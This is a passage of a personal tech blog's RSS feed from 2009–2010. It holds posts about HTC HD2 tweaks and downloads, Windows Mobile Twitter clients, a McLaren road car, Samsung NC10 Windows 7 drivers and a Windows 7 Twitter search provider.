<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=Phl_BiS1O5Y:DxTvRR0oRaE:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=Phl_BiS1O5Y:DxTvRR0oRaE:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=Phl_BiS1O5Y:DxTvRR0oRaE:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=Phl_BiS1O5Y:DxTvRR0oRaE:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=Phl_BiS1O5Y:DxTvRR0oRaE:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=Phl_BiS1O5Y:DxTvRR0oRaE:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/Phl_BiS1O5Y" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2010/01/tablets-why/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2010/01/tablets-why/</feedburner:origLink></item>
		<item>
		<title>HTC HD2</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/jY44p4nKvMo/</link>
		<comments>http://www.nakedcleaner.com/2009/11/htc-hd2/#comments</comments>
		<pubDate>Sun, 29 Nov 2009 20:54:22 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[HD2]]></category>
		<category><![CDATA[htc]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/11/29/htc-hd2/</guid>
		<description>I’ve had my HD2 over the weekend now, and I must say, it has to be the best WinMo device I have ever used. It’s quick, and very (and I do mean very) rarely has lag issues. There are some things to note though. Device needs Compact FrameWork 3.5 installing on it &amp;#8211; .NET Compact [...]</description>
			<content:encoded><![CDATA[<p>I’ve had my HD2 over the weekend now, and I must say, it has to be the best WinMo device I have ever used. It’s quick, and very (and I do mean very) rarely has lag issues.</p>
<p>There are some things to note though.</p>
<p>Device needs Compact FrameWork 3.5 installing on it &#8211; <a title="Download details- .NET Compact Framework 3.5 Redistributable" href="http://www.microsoft.com/downloads/details.aspx?FamilyID=E3821449-3C6B-42F1-9FD9-0041345B3385">.NET Compact Framework 3.5 Redistributable</a></p>
<p>There is a new ‘test’ ROM out for the WWE (unlocked) devices, which is what I am running <a href="http://rs50.rapidshare.com/files/312640442/RUU_Leo_HTC_WWE_1.48.405.2_Radio_Signed_15.28.50.07U_2.05.51.05_2_Test.exe" target="_blank">Download Here</a></p>
<p>Lower the screen sensitivity, obviously this is personal choice, but I found the screen far too sensitive. (<a href="http://rapidshare.com/files/308896736/HTC_TouchScreen_v2.cab" target="_blank">Download desense</a> / <a href="http://rapidshare.com/files/308273174/HTC_TouchScreen_original.cab" target="_blank">Reset to factory</a>)</p>
<p>Other things that you should probably do :</p>
<ul>
<li>Enable the Magnifying Box for text selection      <br /><strong>HKLM/Software/HTC/TextSelection/EnableMagnifier and change from 0 to 1</strong></li>
<li>Turn on 802.11n support     <br /><strong>HKLM/Comm/BCMSDDHD1/Parms/11nModeDisable = Change from 1 to 0</strong></li>
<li>Add shorcut’s for apps that are for some reason installed and left unlinked (all in Windows Folder)     <br /><strong>eT9MyWords.exe / bubblebreaker.exe / solitaire.exe</strong></li>
<li>Install Dutty’s task Manager (the Original HTC task manager) &#8211; </li>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:fb3a1972-4489-4e52-abe7-25a00bb07fdf:7e479abc-9954-4b6e-bb95-50611c4cd72d" class="wlWriterEditableSmartContent">
<p> <a href="http://www.nakedcleaner.com/files/HTCHD2_12575/DuttysTaskManagerforLeo.cab" target="_blank">Download</a></p>
</div>
</ul>
<p>That’s about it for now, full review when I have a chance to go through the whole thing <img src='http://www.nakedcleaner.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>

<p><a href="http://feedads.g.doubleclick.net/~a/7j5uVRaAm_LOabuD6iNgJq9DwtE/0/da"><img src="http://feedads.g.doubleclick.net/~a/7j5uVRaAm_LOabuD6iNgJq9DwtE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/7j5uVRaAm_LOabuD6iNgJq9DwtE/1/da"><img src="http://feedads.g.doubleclick.net/~a/7j5uVRaAm_LOabuD6iNgJq9DwtE/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=jY44p4nKvMo:OLM6cjqpH8U:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=jY44p4nKvMo:OLM6cjqpH8U:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=jY44p4nKvMo:OLM6cjqpH8U:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=jY44p4nKvMo:OLM6cjqpH8U:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=jY44p4nKvMo:OLM6cjqpH8U:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=jY44p4nKvMo:OLM6cjqpH8U:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/jY44p4nKvMo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/11/htc-hd2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/11/htc-hd2/</feedburner:origLink></item>
		<item>
		<title>Twitter on WinMo</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/ItVqXr_v3s4/</link>
		<comments>http://www.nakedcleaner.com/2009/06/twitter-on-winmo/#comments</comments>
		<pubDate>Sun, 14 Jun 2009 13:57:34 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/06/14/twitter-on-winmo/</guid>
		<description>I’ve just flashed my TouchHD upto Windows Mobile 6.5 RTM, and very nice it is too. But that’s not what this post is about. Nope it’s about Twitter clients on WinMo. I&amp;#8217; used to use PocketTwit, it was perhaps a little ‘heavy’, but hey whats a couple of K between friends. It’s got a great [...]</description>
			<content:encoded><![CDATA[<p>I’ve just flashed my TouchHD upto Windows Mobile 6.5 RTM, and very nice it is too. But that’s not what this post is about.</p>
<p>Nope it’s about Twitter clients on WinMo. I&#8217; used to use <a href="http://code.google.com/p/pocketwit/" target="_blank">PocketTwit</a>, it was perhaps a little ‘heavy’, but hey whats a couple of K between friends. It’s got a great interface, and is certainly high on the wow factor, and looks sublime on the HD’s screen.</p>
<p>I tried installing it on 6.5RTM and it’s a no go, not quite sure why, but crashes out every time.</p>
<p>So I went hunting for another client to get me through till PocketTwit&#160; starts working again (and yes tried the dev build).</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2009/06/twikini041.gif" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="Twikini04[1]" border="0" alt="Twikini04[1]" align="left" src="http://www.nakedcleaner.com/wp-content/uploads/2009/06/twikini041-thumb.gif" width="122" height="122" /></a> I bumped into <a href="http://www.trinketsoftware.com/Twikini" target="_blank">Twikini</a>, I remember trying it before, and then not using it because I bumped into PocketTwit. So downloaded it, Installed and must say it’s actualy quite nice, from another point of view though. Yes it’s not got all the flash and bells of PocketTwit, but what it does do it does well. It’s quick, lightweight, and in it’s way it looks pretty (well it’s clean anyhow).</p>
<p>So if you have a device that’s not upto PocketTwit for any reason (screen size, processor, memory or whatever) then I sudgest giving Twikini a go, you wont be sorry.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/7Ei4eurgv6C-LjeS6iR9B36xaQ0/0/da"><img src="http://feedads.g.doubleclick.net/~a/7Ei4eurgv6C-LjeS6iR9B36xaQ0/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/7Ei4eurgv6C-LjeS6iR9B36xaQ0/1/da"><img src="http://feedads.g.doubleclick.net/~a/7Ei4eurgv6C-LjeS6iR9B36xaQ0/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=ItVqXr_v3s4:q2Q83gn-SXg:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=ItVqXr_v3s4:q2Q83gn-SXg:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=ItVqXr_v3s4:q2Q83gn-SXg:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=ItVqXr_v3s4:q2Q83gn-SXg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=ItVqXr_v3s4:q2Q83gn-SXg:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=ItVqXr_v3s4:q2Q83gn-SXg:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/ItVqXr_v3s4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/06/twitter-on-winmo/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/06/twitter-on-winmo/</feedburner:origLink></item>
		<item>
		<title>New McLaren</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/oXfpoUyGL_4/</link>
		<comments>http://www.nakedcleaner.com/2009/02/new-mclaren/#comments</comments>
		<pubDate>Thu, 19 Feb 2009 11:53:41 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/02/19/new-mclaren/</guid>
		<description>You would expect me to post about a new McLaren over on www.f1-blog.co.uk, however this is a newly announced road McLaren. And it’s quite pretty, reminiscent some would say of the Audi R8, but more organic than the Audi 2 seater. Price is expected to be about the R8’s £80.000 so not a million miles [...]</description>
			<content:encoded><![CDATA[<p>You would expect me to post about a new McLaren over on <a href="http://www.f1-blog.co.uk">www.f1-blog.co.uk</a>, however this is a newly announced road McLaren.</p>
<p align="center"><a href="http://www.nakedcleaner.com/wp-content/uploads/2009/02/car-photo-301989-25.jpg" rel="lightbox"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="car_photo_301989_25" border="0" alt="car_photo_301989_25" src="http://www.nakedcleaner.com/wp-content/uploads/2009/02/car-photo-301989-25-thumb.jpg" width="244" height="164" /></a> <a href="http://www.nakedcleaner.com/wp-content/uploads/2009/02/car-photo-301990-25.jpg" rel="lightbox"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="car_photo_301990_25" border="0" alt="car_photo_301990_25" src="http://www.nakedcleaner.com/wp-content/uploads/2009/02/car-photo-301990-25-thumb.jpg" width="244" height="164" /></a> </p>
<p align="center">And it’s quite pretty, reminiscent some would say of the Audi R8, but more organic than the Audi 2 seater.</p>
<p align="center">Price is expected to be about the R8’s £80.000 so not a million miles away from the Porsche and Audi competition.</p>
<p align="center">Frank Stephenson is looking after styling, he comes with a good pedigree (Fiat and Ferrari), and you can certainly see P11 influences in the car.</p>
<p align="center">Slightly shorter than the R8, and similar power levels (450bhp) should make for some fun.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/r5sn8Hsg22BKL1j0PDuZCTv3KDw/0/da"><img src="http://feedads.g.doubleclick.net/~a/r5sn8Hsg22BKL1j0PDuZCTv3KDw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/r5sn8Hsg22BKL1j0PDuZCTv3KDw/1/da"><img src="http://feedads.g.doubleclick.net/~a/r5sn8Hsg22BKL1j0PDuZCTv3KDw/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=oXfpoUyGL_4:rl61qJXbUGY:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=oXfpoUyGL_4:rl61qJXbUGY:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=oXfpoUyGL_4:rl61qJXbUGY:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=oXfpoUyGL_4:rl61qJXbUGY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=oXfpoUyGL_4:rl61qJXbUGY:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=oXfpoUyGL_4:rl61qJXbUGY:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/oXfpoUyGL_4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/02/new-mclaren/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/02/new-mclaren/</feedburner:origLink></item>
		<item>
		<title>It amused me, so ….</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/YzGyeYpZXtQ/</link>
		<comments>http://www.nakedcleaner.com/2009/02/it-amused-me-so/#comments</comments>
		<pubDate>Wed, 18 Feb 2009 22:18:28 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/02/18/it-amused-me-so/</guid>
		<description></description>
			<content:encoded><![CDATA[<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2009/02/20090217.png" rel="lightbox"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="2009-02-17" border="0" alt="2009-02-17" src="http://www.nakedcleaner.com/wp-content/uploads/2009/02/20090217-thumb.png" width="544" height="252" /></a></p>

<p><a href="http://feedads.g.doubleclick.net/~a/j91fm3jQIH6LJL8fFwDwcwlaJpE/0/da"><img src="http://feedads.g.doubleclick.net/~a/j91fm3jQIH6LJL8fFwDwcwlaJpE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/j91fm3jQIH6LJL8fFwDwcwlaJpE/1/da"><img src="http://feedads.g.doubleclick.net/~a/j91fm3jQIH6LJL8fFwDwcwlaJpE/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=YzGyeYpZXtQ:-e4pBXLElUk:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=YzGyeYpZXtQ:-e4pBXLElUk:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=YzGyeYpZXtQ:-e4pBXLElUk:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=YzGyeYpZXtQ:-e4pBXLElUk:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=YzGyeYpZXtQ:-e4pBXLElUk:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=YzGyeYpZXtQ:-e4pBXLElUk:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/YzGyeYpZXtQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/02/it-amused-me-so/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/02/it-amused-me-so/</feedburner:origLink></item>
		<item>
		<title>NC10 Win7 Drivers</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/DtcJ5SC-4Cs/</link>
		<comments>http://www.nakedcleaner.com/2009/01/nc10-win7-drivers/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 16:35:51 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/01/18/nc10-win7-drivers/</guid>
		<description>A few people have asked for the drivers that I’m using on Windows 7 for the Samsung NC10. So here they are, they include the Audio (RealTek) and Lan (Marvel). So download away.</description>
			<content:encoded><![CDATA[<p>A few people have asked for the drivers that I’m using on Windows 7 for the Samsung NC10.</p>
<p>So here they are, they include the Audio (RealTek) and Lan (Marvel).</p>
<p>So <a href="http://www.nakedcleaner.com/wp-content/NC10.rar">download</a> away.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/mI3PZzG-nWpN_N9b3pvzotw05_o/0/da"><img src="http://feedads.g.doubleclick.net/~a/mI3PZzG-nWpN_N9b3pvzotw05_o/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/mI3PZzG-nWpN_N9b3pvzotw05_o/1/da"><img src="http://feedads.g.doubleclick.net/~a/mI3PZzG-nWpN_N9b3pvzotw05_o/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DtcJ5SC-4Cs:oFOpUP6-FUg:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DtcJ5SC-4Cs:oFOpUP6-FUg:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DtcJ5SC-4Cs:oFOpUP6-FUg:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DtcJ5SC-4Cs:oFOpUP6-FUg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=DtcJ5SC-4Cs:oFOpUP6-FUg:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=DtcJ5SC-4Cs:oFOpUP6-FUg:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/DtcJ5SC-4Cs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/01/nc10-win7-drivers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/01/nc10-win7-drivers/</feedburner:origLink></item>
		<item>
		<title>Twitter Search in Win7</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/F4haDP2bqBo/</link>
		<comments>http://www.nakedcleaner.com/2009/01/twitter-search-in-win7/#comments</comments>
		<pubDate>Sun, 04 Jan 2009 17:41:47 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Search Provider]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2009/01/04/twitter-search-in-win7/</guid>
		<description>Was having a play with the Windows 7 Open Search Provider. I’ve knocked one together for twitter, it’s only a ‘general term’ search, might have a look at hooking other search types into it, but that’s for later. If you want it, just download it and either open from the download or double click it [...]</description>
			<content:encoded><![CDATA[<p>Was having a play with the Windows 7 Open Search Provider. I’ve knocked one together for twitter, it’s only a ‘general term’ search, might have a look at hooking other search types into it, but that’s for later.</p>
<p>If you want it, just download it and either open from the download or double click it and Windows 7 will ask permission to add the search provider. </p>
<p>Any issues let me know. (oh you might have to right click and save as the file and make sure the file extension is osdx)</p>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:fb3a1972-4489-4e52-abe7-25a00bb07fdf:d17e940f-3873-49a7-9e54-3d1712f84d84" class="wlWriterEditableSmartContent">
<p> <a href="http://www.nakedcleaner.com/wp-content/uploads/TwitterSearchinWin7_F7AC/twittertheape.osdx" target="_blank">Download Twitter Search For Win7</a></p>
</div>

<p><a href="http://feedads.g.doubleclick.net/~a/Vsnbph_Ow7Z-gIcoiwrNoG4mAyE/0/da"><img src="http://feedads.g.doubleclick.net/~a/Vsnbph_Ow7Z-gIcoiwrNoG4mAyE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/Vsnbph_Ow7Z-gIcoiwrNoG4mAyE/1/da"><img src="http://feedads.g.doubleclick.net/~a/Vsnbph_Ow7Z-gIcoiwrNoG4mAyE/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=F4haDP2bqBo:yd3q_DyGci0:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=F4haDP2bqBo:yd3q_DyGci0:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:3QFJfmc7Om4"><img 